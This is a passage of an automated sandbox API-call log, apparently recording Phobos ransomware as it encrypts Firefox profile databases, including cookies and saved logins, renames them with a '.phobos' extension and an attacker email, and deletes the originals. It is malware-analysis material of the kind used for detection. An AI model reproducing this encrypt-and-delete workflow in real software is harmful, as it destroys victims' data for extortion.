pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.326] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5ad, lpOverlapped=0x0) returned 1 [0202.392] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5b0) returned 1 [0202.392] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5b0, lpOverlapped=0x0) returned 1 [0202.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0202.392] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.392] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.392] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.392] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.393] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.393] CloseHandle (hObject=0x124) returned 1 [0202.393] CloseHandle (hObject=0x178) returned 1 [0202.393] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk")) returned 1 [0202.394] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.395] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=229376) returned 1 [0202.395] CloseHandle (hObject=0x178) returned 1 [0202.395] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite")) returned 0x2020 [0202.395] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.395] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.395] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.396] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.396] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.396] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x38000, lpOverlapped=0x0) returned 1 [0202.398] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x38010, dwBufLen=0x38010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x38010) returned 1 [0202.401] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x38010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x38010, lpOverlapped=0x0) returned 1 [0202.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0202.407] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.407] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.408] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.408] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.408] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.408] CloseHandle (hObject=0x178) returned 1 [0202.408] CloseHandle (hObject=0x124) returned 1 [0202.408] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite")) returned 1 [0202.410] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.411] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=524288) returned 1 [0202.411] CloseHandle (hObject=0x124) returned 1 [0202.411] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite")) returned 0x2020 [0202.411] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.411] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.411] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.412] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.412] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.412] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x80000, lpOverlapped=0x0) returned 1 [0202.449] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80010, dwBufLen=0x80010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80010) returned 1 [0202.529] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x80010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x80010, lpOverlapped=0x0) returned 1 [0202.536] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0202.536] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.536] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0202.536] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.536] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0202.536] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.536] CloseHandle (hObject=0x124) returned 1 [0202.536] CloseHandle (hObject=0x178) returned 1 [0202.536] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite")) returned 1 [0202.540] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.541] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=98304) returned 1 [0202.541] CloseHandle (hObject=0x178) returned 1 [0202.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite")) returned 0x2020 [0202.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.542] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.542] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.543] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.543] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.543] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18000, lpOverlapped=0x0) returned 1 [0202.551] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x18010, dwBufLen=0x18010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x18010) returned 1 [0202.552] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x18010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x18010, lpOverlapped=0x0) returned 1 [0202.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0202.554] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.554] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.554] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.554] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.554] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.554] CloseHandle (hObject=0x178) returned 1 [0202.554] CloseHandle (hObject=0x124) returned 1 [0202.554] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite")) returned 1 [0202.555] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.556] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=458752) returned 1 [0202.556] CloseHandle (hObject=0x124) returned 1 [0202.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite")) returned 0x2020 [0202.556] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.556] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.556] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.557] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.557] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x70000, lpOverlapped=0x0) returned 1 [0202.885] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70010, dwBufLen=0x70010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70010) returned 1 [0202.889] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x70010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x70010, lpOverlapped=0x0) returned 1 [0202.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0202.898] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.898] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.898] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.898] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.898] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.898] CloseHandle (hObject=0x124) returned 1 [0202.898] CloseHandle (hObject=0x178) returned 1 [0202.898] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite")) returned 1 [0202.904] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.905] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=327680) returned 1 [0202.905] CloseHandle (hObject=0x178) returned 1 [0202.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite")) returned 0x2020 [0202.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 